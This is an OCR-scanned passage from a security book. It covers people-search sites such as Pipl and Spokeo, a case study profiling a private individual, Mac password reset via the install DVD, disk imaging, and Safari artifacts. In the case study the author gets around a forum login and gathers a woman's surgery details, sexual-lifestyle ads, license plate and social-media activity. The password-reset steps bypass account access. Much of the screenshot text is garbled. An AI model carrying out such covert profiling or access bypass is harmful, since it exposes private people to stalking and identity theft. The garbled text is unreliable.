be used for social engineering or by people trying to steal a person’s identity. The less information 
you put on the Internet, the better. And, as another countermeasure, you could flood these social 
networking sites with misinformation about yourself and your family. 


People Search Engines 


Another way to get a lot of information about people is to use a people search engine. The informa- 
tion on these website includes 


Court/public records 
Addresses 

Phone numbers 

Email addresses 
Profession 
Publications 

Web pages 

Pictures 

Amazon.com wish lists 
Documents 


There are many of these sites out there, but these three sites seem to be among the most 
popular: 


B Pipl.com 
W 123people.com 
B Spokeo.com 


To use Pipl, put in the first and last name of the person whose information you are trying to find. 
Add the city and the state of that person if you know it. Under Contact Details, Pipl will give you 
a list of the person's contact details, including their addresses and phone numbers. 


. Mame Email Username Phone "^ Business 
pipl jome —— ivwrnsone vs 
fst Name 


Last Mame ety State Country 


Jesse Varsalone, United States 


Contact Details 
Jesse Varsalone, Wycliffe Ave, Catonsville, MD... 


Jesse J Varsalone, Age- , 5048 , Columbia, MD. (410) 992-0 
& Pe e^ 


JESSE J VARSALONE, 1% WYCLIFFE AVE, PARKVILLE, MD 21234... 


Under the category of Personal Profiles, you may see that person’s Amazon customer profile. 
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Personal Profiles 
[17] Jesse Varsalone... 


l Person Table Community - Freebase 


[247] Jesse Varsalone... 
Customer Profile - Amazon.com «4————— 


Click on the person's name above Customer Profile to see their Amazon wish list. 


Jesse Varsalone 


An Amazon wish list can tell you valuable information about a person. 


Wish List 


Anyone can search for and see this list. See what they see. (Change settings) 
Manage This List) Share With Friends Print This List 


Page 1 of 1 (3 items) 


Ty Beanie Baby Swiper Dora's Fox 
by Ty 


$2299 $7.42 
In Stock. Offered by Amazon.com 


21 Used & New from $2.31 
toietetet: © (23 customer reviews) 


( Add to Cart_) Move to a new list | Delete item 


Matchbox Waste Management Truck 
by Mattel 


Currently unavailable. 
We don't know when or if this item will be back in stock. 
Yr" (v) (1 customer review) 


Move to a new list | Delete item 


Vtech Bugsby Reading System Book - Wonder Pets 
by V Tech 


$2499 $9.58 
In Stock. Offered by Amazon.com 


26 Used & New from $4.98 
offrir (9) (1 customer review) 


(QAddto Cart) Move to a new list | Delete item 


Pipl also tells you about the person's occupations and business relations. 


Professional & Business 


Jesse, Varsalone. Baltimore, Maryland Area... & 
Professional Profile & Networking - LinkedIn 


— Jesse Varsalone, DC, US, [Assistant Professor, Higher Education... & 


Professional Profile & Networking - Linkedin 


It also provides their birth details including the month, day, and year, and city where they were 
born. I remember serveral cases where "In what city were you born?" is a security question. 
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Public Records 


JESSE, VARSALONE, 1989-19 1@ [Towson] MD... 
Birthday Record - BirthDetails 


The Quick Facts section of Pipl provides you with a general overview of the person. 


Quick Facts 
Jesse Varsalone is a Certified Cisco Network Academy Instructor and holds the CCNA certification... 
Jesse Varsalone is well versed in the area of Microsoft products and the advantages and disadvantages associated with them... 


by J VARSALONE, -, 2008, Jesse Varsalone is a Certified Cisco Network Academy Instructor and holds the CCNA certification.KEY 
FEATURES*Full coverage of objectives for Cisco... 


Other sections of Pipl include videos, publications, web pages, blog posts, and documents. 


Documents 


JESSE VARSALONE. Division of Continuing Professional Studies. George Mason University, B.A.. University of South Florida, M.A.. 
— 


ADJUNCT FACULTY 2010 www.champlain.edu 


E. Jesse Varsalone. Get up to speed with the ThreadX 5 real time operating system - deployed in over 500 million devices worldwide 
psi including cell ... 


Lybrary.com Catalog www. lybrary.com 


JESSE VARSALONE. Continuing Professional Studies Division. George Mason University, B.A.. University of South Florida, M.A.. GM 
E nsa 


CHARLES ADAMS Business Division SUNY Cortland, BS Colorado State ... www. champlain.edu 


A website that is similar to Pipl is 123people.com. It has a unique feature called a Tag Cloud, 
which gives you a lot of key phrases related to the person whose information you are getting. 


Tag Cloud 


Mac OSX Artifacts —Forensicinvestigators Toolkit 
Morrissey Computer Forensis Stock Law 


entorement Price Forensic Analysis 
Companion IPod DVD Microsoft Forefront 
Securty Paperback  seasity professionsis EBook 
rwwacmesot IPhone 
Forensics 


The first thing you will notice is pictures of the individual along with age, address, city, state, 
email address, and their phone numbers. In some cases, email and phone number information will 
be incomplete and you will be forwarded to pay services to get that information. 


» People search results for: Jesse Varsalone Share this search w. ÈE EJ gM do RES 
Jesse Varsalone's Pictures (15 Premium Public Records (9 
m pepe Cmm m m | ama q peoples 


‘J Jesse J Varsalone isos- 
21224 BALTIMORE, MD - 
EE esse Varsalone ioe 
Columbia, MO - siew 2 
i) 3 " © 


O) entries for Jesse Varsalone found in: 
Marviend, 


BS Jesse J Varsalone sos...) 
Elkridge, MD - view etai 
EE Jesse Varsalone (aoe: 3 
E- 4j Tampa, FL - view details | adrcund ches 
p p o p p 


12nexp» 


1 2 next>> Ad Mehr Fotos zur gesuchten Person finden? Schau auf musti TENENTEM 


Sores 


phone search for Jesse Varsalone led to 2 resurs 


| Jesse J Varsalone 410. nas 
- CT, 21045 COLUMBIA 
Eull public record available 
< Jesse Varsalone rT a 
E ~~ ELKROGE 


Full public record available 


Columbia, MD, 21048 
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Another thing that 123people.com will aggregate is videos that the person has posted online. 


Videos (10 


S DojoSec Monthly sga Vista 
Briefings 


‘The site 123people.com also provides web links and links to blogs and microblogs (Twitter). 
For some individuals, there can also be biographical and business professional information. There 
are also links to pay sites that provide you criminal record checks of individuals. 


Biographies (10 
pecple 


Ø Amazon.com: Jesse Varsalone: Books. Biography. Blog 
other Jesse Varsalone related products (DVD, CDs, Apparel). Check out pictures, 
bibliography, biography and community discussions about Jesse Varsalone 
lesse Varsalone eBooks 
Jesse Varsalone ebooks. Download Adobe Mobipocket epub Ereader Microsoft Reader at 
Diesel eBook store 
fo chapters indigo ca 
Indigo Books Samp; Musi 
approach to satisfying the booklover. 


s > Author Jesse 
immitted to providing a stress-free 


At the bottom of the page you will find a section called Related People, which includes a 
sample listing of the person's associates on Facebook and Twitter. You can click the All button to 
see additional listings, but it is not all-inclusive. There is also a listing of social networking profiles. 


Jesse Varsalone's Social Network Profiles (2 


= 


P tacebook | 


ava Anzeige: Jesse Varsalone auf sms.at - Die Online Community! 


H Jesse Varsalone H Jesse Varsalone 


e m 


Another people search site and information aggregator is Spokeo.com. When you first visit 
the site, you will notice that the motto is "Not your grandma's phonebook" Good motto. Spokeo 
allows you to search on any of the following parameters: 


E Name 
B Email 
W Phone 
W Friends 
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About Blog Directory Privacy Terms Help Contact 
Copyright © 2006-2010 Spokeo Inc. All rights reserved 


When searching by name, Spokeo will return the results of people with the name you searched 
for with one or more addresses. Click on the address that you believe is the person’s current one. 
Spokeo will provide you with the following categories of information on the person: 


Basic information 
Property 

Family 

Social 
Neighborhood 
Wealth 


The basic info provides you with the following information on the subject you search for: 


Name with middle initial 

Phone number (mine was unlisted) 
Spouse name 

Sex 

Zodiac sign 

Race 

Marital status 

Rent or own status 

House value 

Age 
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I don't know how this website got my unlisted phone number. I blame my wife for that one. 


Basic Info Social Neighborhood 


Jesse J Varsalone 
T ann C: Columbia, Maryland 21045 
[ES (410)ememmes 


AR eee Versalone 


28 
x 4». ae AS š 
g = 22 e cia “iz 


Male Early 40's Married House $339k Hobbies 


Y" e = E 4 a 


Caucasian Libra Politics Religion Education Occupation 


The Property tab provides you with 


B A picture of the residence and an estimated value of the property 
B Lot size and property square footage 
B Number of bathrooms and floors 


Basic Info Property Neighborhood 


| > Satellite Bird's Eye 


$339k : 6,600 sqft : 1,869 sqft : 


Est Home Value : Lot Size $ Home Size 


The Family tab provides you with 


B Name and age of person 
B Name and age of spouse 
B Number of children 
B Length in residence 
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Basic Info Property | Family Social Neighborhood Wealth 


The Varsalone Household 
* The Varsalone household has lived in Columbia, Maryland on 
| Sonde oae 5 years. The household totals < 
people. 


| & | Jesse J Varsalone | 2 | GRD Varsalone 
40s | Male 30s | Female 


The Social, Neighborhood, and Wealth tabs cannot be viewed without a Facebook logon or 
a Spokeo account. Another option that can be used with the Spokeo website is the email search 
feature. The email address search can provide you with the following information: 


B Name of person 
W Photos 
W Videos 
B Blogs and updates 
E Social networks 
— Ebay 
— Youlube 
— Windows Live 
— PhotoBucket 
— Zillow 
- Yelp 
— Xanga 
— Last.fm 
— TripAdvisor 
— Many, many more 
W IP addresses of the email server 
W Validity of email addresss 


In this case, I tested an old email address of mine, and it came back with several hits, including 


Full name of Jesse Varsalone 

Quick mix from Pandora music service 

Amazon wish list 

Domain names I own 

The fact that I am a part of three social networks 


To use the View More feature, which will provide you with more detail about any of the links or 
information Spokeo has aggregated for that email account, you need to join their service. For a 
monthly fee totaling under $60 a year, you will get even more information on that account. 
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EMAIL JOIN LOGIN 


spokeo = 


Jesse Varsalone «-——— ———— 


mz m _ SEE FULL RESULTS 
& Basic Results 


Name: Jesse Varsalone «&—— Full Results: Available 


te Photos & Video 


=e 


oe} 


Search for more photos and videos from Jesse Varsalone. » Click here 


z Blogs & Updates 


view MORE 
@ We found 19 blogs and updates by Jesse Varsalone. 
{2 hopkinsinstructor's QuickMix «&————— 2i Ty Beanie Baby Swiper Dora's Fox 4——— 
(2 Matchbox Waste Management Truck <— 2 Vtech Bugsby Reading System Book - Wonder Pets «fe 
[2 whois 9q1.net «——— Domain information of a9u.net | domaincrawler.com «—— 
Social Networks 
vitw MORE 


«w' We found Jesse Varsalone on 3 social networks. | e————— 


A Case Study 


Sometimes when you work with smart people your job is a lot easier. Whenever I run into the best 
and brightest, I am always looking to recruit them to work with me. I met one couple and I talked 
to the guy, who was in education, about coming to work in a nontechnical role with my employer. 
The man and his female companion were very friendly, and she seemed be extremely motivated to 
get her partner to switch occupations for financial reasons. Before referring the person to the job, 
I thought I would do a little research on them. So, I threw the email address in Google, and only 
got a single hit on that email address. 


Gee MaMa) 2h00 com X | Search 


1 resut (0.11 seconds) Advances search 

29 Everything Lookup This Yahoo Email —ÓÓ 
Ni N 

@ Images Testen ahoo Want to see Yahoo email owner's Name, Address, Photos & 

BB videos Reverse Email - People Search - Reverse Phone - Fnends Search 

Z) More D - Viewing Profi 


Last Seen 0 posts (0 per 
bengatensts comdorumondes php pm oc hed x: 


* Show search tools 


When I tried to visit the site that was connected to that person's email address, it gave me an 
error saying that I was not permitted to view the member profile without signing in to the site. 
I was able to determine that the website was for people who had weight loss surgery. 
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-— 


Members 


The Neighborhood 


An Error Occurred «————— 


Sorry, an error occurred. If you are unsure on how to use a feature, or dont know why you got this erro 


© [410245] You are not permitted to view member profiles | «&————————————— 


You are not signed in ag —— — —— 


4? Click here to log in. 4————— 


Useful Links 


Forgotten Password Recovery 
Register a new account 

Our help documentation 

Contact the forums administrator 


I was still very interested in viewing that person's member profile. I tried to view any of the 
pages that might be in Google's cache, but the web page was not available to view in Google cache 
either. So, I tried to use the Passive Cache plug-in for Firefox to view content on the web page. 


30 Open Link in New Window 

URL http://, Yahoo: Yahoo Open Link in New Tab 
livingafterwls.com/forum/index. php? This Link 
in order to show you the most relevant ré arly 
f already displayed. Copy Unk Location 
if you like, you can repeat the search wif, — tocation Lookup "72.14.204.147" 

] 49 DownloadHelper > 
Did you mean to search for: S ; > 

Pas: Link 
PF PassiveRecon > 
Qaarch 


Information in the forum, which was viewable with the Passive Cache plug-in, included 


B Name 
B Date of birth and age 
B Interests 
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B City and state 

B Pre- and post-op weight 

B Name of doctor who performed surgery 
B Type of surgery 


Personal Info 
Lacer rss 
New In Town 


41 years old 
Female 
Baltimore, IMD 


Born Aug-#- 1969 
Interests 

Dancing, setsmwerravcling, 

cooking, essit 
Other Information 

Arrival Date: 913.07 


Personal Stats: gastric bypass; 


pre-op weight. 3 post-op 
weight: Wt performed by Dr. 


MNNMEINEMIRe at University of 


Before using the information I found in the forum with Passive Cache, I decided to google part 
of the initial part of the email address (without the @yahoo.com). This technique yielded me a lot 
more information about the individual. Several of the links were for “swinger” websites. 


Br k on Twitter 
Pette, — MUNI 
twitter com/ 


doesn’ have a personal statement currently. Personal Info ... Other users 


DENGER tiec 

UST 

have lef no comments for Friends ... 

mngaterms com/forum/index php?, p ached 

Couple (man and woman) seeking Woman - Milf. Date com MILF Dating... 
GOLD MEMBER, ! , ONUNE NOW. Looking for real people. Gender. 
Couple (man and woman) His Age: 45. Her Age: 41. Location: Essex, MD.UNITED STATES ... 
a MROPE MDE Yn POP 8 


Current Arbutus swingers clubs for Arbutus swingers and swinging ... 
The list below is a subset of the Bwingers in Arbutus area) Create a free swingers account so 
you can see and write to them all. D blank ... 


www. swingiifestyle.com/swingers/.. /arbutus. swingers.htm - Cached 
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When I clicked on the first link in Google, this person had a post in a forum with a picture of 
them in a bathing suit. They were on the car where you could clearly see the make and model of 
the car. You were also able to see the license plate of the vehicle clearly in the picture. 


Member Since: 3mm 


View full profile 


Tilliday, W August 2009 


; tdeo. My $ year as on 
"f way to the Ge of asa 
unum ond my $ yesrag was 
attending his GENE of eee 

GEMENS Tiere ubi! agis bares no. 


emamna secondly. tl 


ei rie ici since becoming illl, 
but to ep that I would soon be 


Then I clicked on the Twitter link, which enabled me to view many tweets of that person. The 
person's real name was on Twitter. The tweets provided me with information about the person 


such as 


Interests 


Hangout locations 


Favorite sports 


L| 
L| 
B Relationship status 
L| 
L| 


teams 


Clothing preferences 


Wee Nothing like running around ail naked to feel so Ie 


RP aD ME 


Out with my fav guy@Lapalapa-enjoying Bereaeieitucopungiem 


Ellicott Cityll 
5:39 PM Jur DM 


Once I had the real name of the person, I went to Facebook.com and typed the person's real 
full name. The first time I went there, their profile was public and I was able to see everything 
written on their wall. The next time I visited the individual's Facebook site when I was writ- 
ing up this case study, they had set their profile to private. While I was initially disappointed, 
I felt that even with that setting, you can still see plenty of information on that individual, 


including: 


W Friends 

W Likes 

B Quotes 

B Music interests 
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[All Likes | Mutual Likes 
| Tattoos by aam dme] * 
|. Professional Service — 
L- 
SABRES Like 
Government Lx 
qub Framing & Engraving Like 


Local Business P 


Summary 


Social engineering is a technique used by skilled hackers to get information about individuals that 
they can use during their "attack." With the popularity of websites like Twitter and Facebook, 
individuals are more likely to give out information about themselves to the entire Internet. Any 
person with a computer and Internet access can view the publicly available information. It is a 
good practice for people to lock down their security settings on social networking sites such as 
Facebook. The less information you put on the Internet, the better. 

There are also sites that aggregate information about people, including Pipl, 123people.com, 
and Spokeo. These sites have a lot of information about individuals, like their address, date of 
birth, and occupation. In some cases, you will even be able to find the person's Amazon wish list. 
People in information assurance can use any of these sites to their advantage. They might try to 
research potential future employees or to find out if any information about people within their 
organization and company have leaked to the public. As the Internet continues to grow and iden- 
tity theft continues to rise, try to keep your information personal by keeping your name off the 
Internet as much as possible. This chapter demonstrates why it is a good idea to try to keep your 
personal information as private as possible. 


Chapter 13 
Hack the Macs 


Introduction 


Since the Mac is such a popular tool among hackers and the younger, hipper generation, I deter- 
mined that a chapter should be dedicated to them. One reason Macs are much more widely used 
than they used to be is the fact that the newer ones run on Intel-based platforms. That means 
on newer Macs, you have the ability to install Microsoft Windows or even Linux. If you ran 
an older Mac, it ran OS 9. What I hated the most about that operating system is the fact that 
it did not allow you to get to a command-line environment. Hackers prefer the command line 
and Mac OS 9 was basically a// graphical user interface (GUI). Figure 13.1 is not a picture of an 


Figure 13.1 An older iMac running Mac OS 9. 
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old television monitor; it is what is now referred to as a classic Mac. This Mac wound up in the 
Howard County, Maryland Landfill. 

With OS X, everything changed for Mac. They began a new UNIX-based operating system, 
some say based on Free BSD. This Mac gave users access to the all important command environ- 
ment. To get access to a terminal on a modern Mac running OS X, 


1. Select Go from the Menu bar. 
2. Select Utilities. 
3. Double click on the Terminal icon. 


eoo Terminal — bash — 82x28 

Last login: Tue Nov 30 21:12:27 on ttypi 5 
Welcome to Darwin! — 
MyMac:~ Jesse$ ls 

Desktop Library Music Public 

Documents Movies Pictures Sites 

MyMac:~ Jesse$ pwd 

/Users/Jesse 

MyMac:~ Jesse$ who 

Jesse console Nov 38 20:56 

Jesse ttypi Nov 38 21:12 

MyMac:~ Jesse$ ls /Users/mason/ 

Desktop Library Music Public 

Documents Movies Pictures Sites 

MyMac:~ Jesse$ ls -la /Users/mason/ 

total 24 

drwxr-xr-x 12 mason mason 408 Aug 23 2908 . 

drwxrwxr-t 9 root admin 386 Nov 30 20:56 .. 

-rw-r--r-- 1 mason mason 3 Aug 23 2008 .CFUserTextEncoding 

-rw-r--r-- 1 mason mason 6148 Aug 23 29008 .DS Store 

drwx- 3 mason mason 102 Aug 23 29008 Desktop 

drwx-————- 3 mason mason 162 Aug 23 298808 Documents 

drwx-———- 19 mason mason 646 Aug 23 2888 Library 

drwx--—--- 3 mason mason 102 Aug 23 2008 Movies 

drwx------ 3 mason mason 162 Aug 23 2008 Music 

drwx---——-- 3 mason mason 102 Aug 23 2008 Pictures 

drwxr-xr-x 4 mason mason 136 Aug 23 29008 Public 4 
drwxr-xr-x 5 on mason 1780 Aug 23 2008 Sites v 


mas 
MyMac:~ Jesse$ B Aa 


Apple decided to name all of their releases of Mac OS X after some type of wildcat. Here is an 
easy way for you to remember them all. There will be a quiz at the end of the chapter. 


10.0 | Cheetah Check 
10.1 | Puma Please 
10.2 | Jaguar Just 

10.3 | Panther Please 
10.4 | Tiger Tip 

10.5 | Leopard Low 
10.6 | Snow Leopard | Sir 

10.7 | Lion Lancelot 


Apple has done a great job of targeting their products, such as iMacs, iPhones, iPads, and 
iPods, to the younger generations (see Figure 13.2). The company is well known for their innova- 
tions and their famous commercials. 

Chapter 1 told you how to bypass a password in Microsoft Windows and Chapter 2 showed 
you how to recover them. Apple actually makes it even easier. The password on a machine can be 
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Figure 13.2 A newer Mac running OS X is a favorite among younger generations. 


changed simply by booting to the install CD. However, that will not work effectively if the Mac 
has FileVault enabled for that user. FileVault is an Apple technology that encrypts the user's home 
folder. This is different from Microsoft's BitLocker, which encrypts the full volume. BitLocker is 
only available on the Ultimate and Enterprise editions of Windows 7 and Vista. Mac only has one 
version, and it comes with FileVault. 

To boot to the Mac OS X install DVD (for password reset), 


1. Hold down the Option key on the keyboard and turn the PC on. 
2. Select the Mac OS X install DVD as the boot choice. 
3. Choose your language and click Next at the Language Selection screen. 


Cw 


Mac OS X 


Use English as the main language 


kapt 

Utiliser le français comme langue principale 
Deutsch als Standardsprache verwenden 
Usar español como idioma principal 

Usa l'italiano come lingua principale 

Usar Português do Brasil como idioma principal 
Gebruik Nederlands als hoofdtaal 

Använd svenska som huvudspråk 

Bruk norsk som hovedspråk 

Brug dansk som hovedsprog 

Käytä pääkielenä suomea 

DUS PALES 
LEP AE RAS 

F HAS Star AS 
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Á. Select Utilities from the Menu bar and choose Reset Password. 


@ installer fie Edit 


Window 


E sunup osx 


igj/ osx oom Install Mac OS X 
L MI come to the Mac OS X Installer 
p System Profiler 


Welcome to the Mac OS X Installer 


ongko 


To install the additional applications that came 


with your computer, click Continue and follow 
the onscreen Instructions. 


To quit, choose Quit from the installer menu 
and click Startup Disk. 


5. Click the Hard Drive icon and select the user you want to reset the password for. 


Select a user of this volume to reset their password 
f Jesse (Jesse) s | 


Enter a new password for this user 


Reenter the new password for this user 


Enter a new password hint for this user (optional) 


Csave) 


6. While you are there, select the system administrator and reset that password also. 


Select a user of this volume to reset their password 


f System Administrator (root) HJ 


Enter a new password for this user 


mis: J 


Reenter the new password for this user 


Enter a new password hint for this user (optional) 
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7. Restart the system and the new password should work. 


Another way the Mac can be exploited (or most computers for that matter), is to take an 


image of the system. A Mac can boot to a variety of live CDs such as Raptor, HELIX, and 
BackTrack. 


To boot to a live CD on a Mac, 


1. Hold down the Option key on the keyboard and turn the PC on. 
2. Select Windows as the boot choice. 
3. Click the Windows arrow. 


4, Open a terminal in Windows and type the following command: fdisk —I. 


Shell - Konsole 


5. Add your USB (or Firewire) mass storage device. 
Note: The USB device should be formatted new technology file system (NTFS). If you used 
FAT32, you would need to split the images into pieces because the largest size file allowed 
on an FAT32 system is slightly under 4 GB. Don't use HFS+ because many of the live CD 
distributions that are largely Linux-based will not be able to read the file system. 
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6. Type the following command again to see the newly added device: fdisk 1. 


Shell - Konsole 


7. Make a directory called images by typing mkdir /mnt/sdbl/images. 
8. Change to the directory by typing cd /mnt/sdbl/images. 
9. Image the system by typing the following command: dd if=/dev/sda of=mac.dd. 


Shell - Konsole 


Note: You could make your life easier by calling the image mac.dmg instead of mac.dd. 


Later versions of the Mac OS X operating system can read NTFS, but they cannot write to it. 
It is a more standard practice to give a DD image a DD extension, but naming it DMG will save 
you from having to go though the step of installing NTFS-3G so you can rename this file. After 
the Mac has finished imaging, your terminal will return to the pound (£) sign. The easiest way 
to analyze this image is by putting it on another Mac. In order to write to the external hard drive 
formatted with the NTFS file system, you will need NTFS-3G. Go to http://macntfs-3g.blogspot. 
com to download the NTFS-3G driver for Mac OS X. There is also a commercial product from 
Paragon Software that provides NTFS support. 

To install the NTFS-3G driver for Mac OS X, 


1. Download the DMG file from http://macntfs-3g.blogspot.com. 
2. Double click the DMG file. 


ntfs-3g-2010.10.2- 
| macosx.dmg 
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3. Double click Install NTFS-3G. 


| R8NTFS-3G 2010.10.2 


e-— ? 


Install NTFS-3G NTFS-3G User Guide 


Á. Click Continue at the Welcome to the NTFS-3G installer screen. 


e008 @ Install NTFS-3G 2010.10.2 


Welcome to the NTFS-3G 2010.10.2 Installer 
Thank you for downloading NTFS-3G for Mac OS X! 


9 Introduction This package will install read/write file system support for the 
@ License Windows NT Filesystem (NTFS) using the free software project 
NTES-3G. 


@ Select Destination 
Please visit http//macntfs-39.bloaspot.com for the latest version of 
@ Installation Type this package. 


@ Install The package contains the following software components: 


@ Caching mode NTFS-3G ( » 3) 
€ Finish Up Copat O ne IQ Lee 
Released under the General Public License (GPL) Version 2. 


ntfsprogs ( hitp/www.linux-ntís.org ) 
Copyright © The Linux-NTFS project, 
led by Anton Altaparmakov. 
Released under the General Public License (GPL) Version 2. 


MacFUSE ( htipZicode.google.com/p/mactuse ) 
Copyright Google Inc. 


5. Click Continue at the Software Licensce Agreement screen. 


eoo ^w Install NTFS-3G 2010.10.2 
Software License Agreement 


© Introduction English 


6 License I o 
GNU GENERAL PUBLIC LICENSE 


@ Select Destination 


@ Installation Type Version 2, June 1991 

@ Install 

€ Caching mode Copyright € 1989, 1991 Free Software Foundation, Inc. 

@ Finish Up 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA 


Everyone is permitted to copy and distribute verbatim copies of this license 
document, but changing it is not allowed. 
N I S Preamble 
The licenses for most software are designed to take away your freedom to share 
and change it. By contrast, the GNU General Public License is intended to 


guarantee your freedom to share and change free software—to make sure the 

software is free for all its users. This General Public License applies to most of 

the Free Software Foundation’s software and 10 any other program whose Ww 
" 
* 


authors commit to using it. (Some other Free Software Foundation software is | 
covered by the GNU Library General Public License instead.) You can apply it 


——— —— | 


6. Click Agree if you agree to the terms of the software licensce agreement. 


To continue installing the software, you must agree to the terms of 
the software license agreement. 


Click Agree to continue or click Disagree to cancel the installation. 


( Disagree ) ( Agree ) 
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7. Put in the password if required. 
Authenticate 


(Y Installer requires that you type your password. 


Lat 


b Details 


© C ED 


8. Click Install. 


eoo @ Install NTFS-3G 2010.10.2 
Easy Install on "Untitled" 
© Introduction k 
6 License Click Install to perform a basic installation of this 
software package on the volume "Untitled." 
© Select Destination 
© Installation Type 
@ Install 


@ Caching mode 
@ Finish Up 


NTFS 


Customize ) — ——(Ceetese (C instali) 


^ 


9. Select No caching (the safer option). 


eoo ¥ Install NTFS-3G 2010.10.2 
Caching mode 
© Introduction (9 Nocaching| «———— 
6 License This is the safest option if you would encounter the situation where 
the disk loses connection with the system without being properly 
© Select Destination unmounted. All writes will go directly to the disk device, with no 
i m" additional layers. 
© Installation Type 
O UBLIO caching 
© Install Boosts performance in all situations by keeping an internal block 
© Caching mode cache in memory. This is a stable solution, and works well. However, 
if you would accidentially disconnect your hard drive, encounter a 
@ Finish Up system crash or have a power failure, chances are that the most 


recent data that you wrote to the NTFS volume hasn't yet been 
written to the actual device, resulting in data loss and possible 
inconsistencies that need to be repaired with 'chkdsk' in Windows. 


For an NTFS driver offering better performance than with UBLIO 
caching, while still keeping your data safe, please consider our 
commercial product, Tuxera NTFS for Mac. 
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10. Restart your machine. 


eoo %¥ Install NTFS-3G 2010.10.2 
The software was successfully installed 
NTFS-3G for Mac OS X has been installed! 


© Introduction 
You are recommended to restart your computer to be sure that the 
6 License changes made to the system will take effect. 


© Select Destination In most cases however, you only need to open Disk Utility and unmount’ 


remount your NTFS volumes for this version of NTFS-3G to take over 
S inatalistion Type from the previously used NTFS driver. 
6 Install In that case you can just close this window without restarting. 
6 Caching mode Settings for NTFS-3G can be changed using the NTFS-3G preference 
pane. To access the preference pane, start your ‘System Preferences" 
6 Finish Up application (& Menu -> System preferences...) and click the NTFS-3G 
icon. 


Please report any problems that you experience with NTFS-3G to the 
Tuxera Forums. 


Good luck! 


— C Gl» 


Now it is time to read that image file. This method will zo allow you to view deleted files and 
folders. In order to do that, you will need a forensic tool like EnCase, FTK, X-ways, PTK, or 
Autopsy. However, you will be able to see everything that was not deleted on that drive unless 
they were using some form of encryption like FileVault or TrueCrypt. Attach your LaCie drive 
with the NTFS file system. 

To read the DD image on Mac OS X, 


1. Hold down the Control key and click and select the Get Info category. 


E untitled 
E EXCHANGE Open With 


Print 
Get Info 4———— 


[suem enger gi: wei 


2. Click the Name & Extension category. 


wy Name & Extension: 
mac.dd 
LL] Hide extension 


b» Open with: 
Y Preview: 


* Ownership & Permissions: 
You can read and write 


338 " Defense against the Black Arts 


3. Change the extension from DD to DMG. 


Y Name & Extension: 
__) Hide extension 


b» Open with: 
* Preview: 


* Ownership & Permissions: 


You can read and write 
aa 


4, Answer “yes” to the question, “Are you sure you want to change the extension from “.dd” to 
“dmg”?” 
|^ R ^] 


Are you sure you want to change the extension 
from ".dd" to “dmg”? 


K If you make this change, your document may open in a 
different application, 


5. You now have the ability to browse through files and folders. 


Now, you have the ability to locate the following items on the disk using search: 


Videos 

Photos 

MP3s 

PDFs 
Documents 
pslist 

Internet history 
— Safari 

— Firefox 


— Opera 
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Mac OS X and Safari 5 Internet Artifacts 


A lot of the good stuff can be found in peoples’ Internet caches. Safari is the main browser used 
on the Mac OS X operating system, so this next section will cover Safari artifacts in detail. Apple, 
as always, keeps changing how Safari artifacts are stored. Previously, these artifacts were stored in 
the system domain. Firefox and Chrome have been making inroads for Mac users. Even those that 
use Safari aren't always using the newest version of Safari. Previously these artifacts were located 
in the following directory: /private/var/folders/[2 character folder]/[27 character folder]/Caches/ 
com.apple.safari/. 


- Google 


Adverced Search 
Language Toon. 
Google Search Im Feeling Lucky 
horrea mono yot 
Advertising Programs — Business Sohutons About Googe View Pane 


© 2090 Privacy 


On OS X10.6.4 running Safari 5, the Internet history artifacts have moved back to the user 
domain. One will notice that there are even more artifacts because of the new features that Apple 
has incorporated into their newest browser. Let’s first look at Safari and its features. 
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‘The Safari Menu bar has options for blocking pop-ups, private browsing mode, resetting Safari, 
and emptying the cache. Some of these have forensic implications, like private browsing, which 
will keep Safari from storing personal information, in case someone images your Mac. 


Safari 


About Safari 
Report Bugs to Apple... 
Preferences... 


x, 
Web v Block Pop-Up Windows 03K Gmail more v iGoogle | Search settings | Sign in 
Private Browsing... 
Reset Safari... 
Empty Cache... XXE 
— . Google 
Hide Safari XH 
Hide Others. X XH 
Show All 
Quit Safari xa Advanced Search 
———— Language Tool. 
Googie Search | I'm Feeling Lucky 


Advertising Programs — Business Solutions — About Googie 


©2010. Privat 


Sign in to see your background image 
—————————————————— M V]——A—————————T— t 


‘The following settings within the Safari browser will have forensic implications: 


1. Private Browsing: Prevents any history and caching of events. Private browsing does a decent 
job. But selecting Keyword Searching with a forensic tool like Encase will reveal some rem- 
nants of the private browsing session. 

2. Empty Cache: This is one feature that allows the user to empty the Cache.db in his user pro- 
file. This feature will protect users from tools that are able to parse information from Internet 
history. The following image is a Cache.db file that has NOT been erased using the Empty 
Cache feature of Safari. 


1 
2 : 1 
3 3 <?xml version= «?xmi version- G«mport urit «?xmi versions 
4 4 «?xmi versione <?xml versions /*... _<?xmi versions 
5 $ «?xmi versione <?xml versione /*!... | €?xml version= 
LJ 6 «?xmi versions <?xml versions «IDOCTYPE htr <?xml version | 
7 7 «?xmi version= <?xml version= CIF89a _ <?xml version= 
D 8 «?xmi version= <?xml version <!DOCTYPE htr <?xml version= | 
LI 9 «?xmi versions <?xml version= @PNG | «?xmi version j 
10 10 «?xmi version= <?xml version= <!DOCTYPE htr <?xml version= | 
i 11 <?xml versions <?xml version= htm! body, div,s <?xml version= 
12 12 «?xmi versions <?xml version= t... «?xrnl version « | 
a 13 «xmi version= «?xmil versions tinyMCE addi 16 «?xmil version= 
14 14 <?umi version» <?xml versions /*... <?xml versions 
as 15 «?xmi version= «?xmi version= //core ... [<?xml version= 
16 16 «?xmi version= <?xml version= <!DOCTYPE htr <?xml version= t1 
iz 17 <?xml versione <?xml version= 4PPNC <?xml version « M 
C< 1- 1000 of 7098 C>) o 
A 
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After utilizing the Empty Cache feature of Safari, the Cache.db file has no remnants. 


‘Deo sese oe 
me COCA) 


ewy response. cbc [request object (ree xa [proto prope | userinfo 


Corne) [C130 


There are other artifacts that are left by Safari that could reveal your personal information, 
including 


W Top sites plist 

m Downloads plist 

W History plist 

W Files in cache, such as JPEGs 


The top sites plist will reveal a lot about an individual. 


> Ranneduti Srrungs Ariy |© nema) 
Onrolrresónesiasittod ^ed. Date Aug 21, 2000 11.00.49 AM 
*"'TosSaes Aera (12 ems) 
vken o D«monany le nera) 
Toph tec Ri String ELI [mas fore googhe.comt 
» temi e MERE 
Li. dE d D«tonary |a meres) 
mend (Dictorary |2 merma) 
>nens DWemomary (2 mems) 
hen Ss Dutonicy je merra) 
> hen € Dutorary = 04 terma) 
hen 7 DWememary (2 nemi) * 
rema Dweomary — (2 nems) - 
» ne» Denomy Q ners) 4 


Anay 1596 nems) 
Themo Grctionary 7 homs) 
Sing ng: / rorem ule Comm 
Li] Aray (7 nems) 
GespiayTi e Seine Coogie 
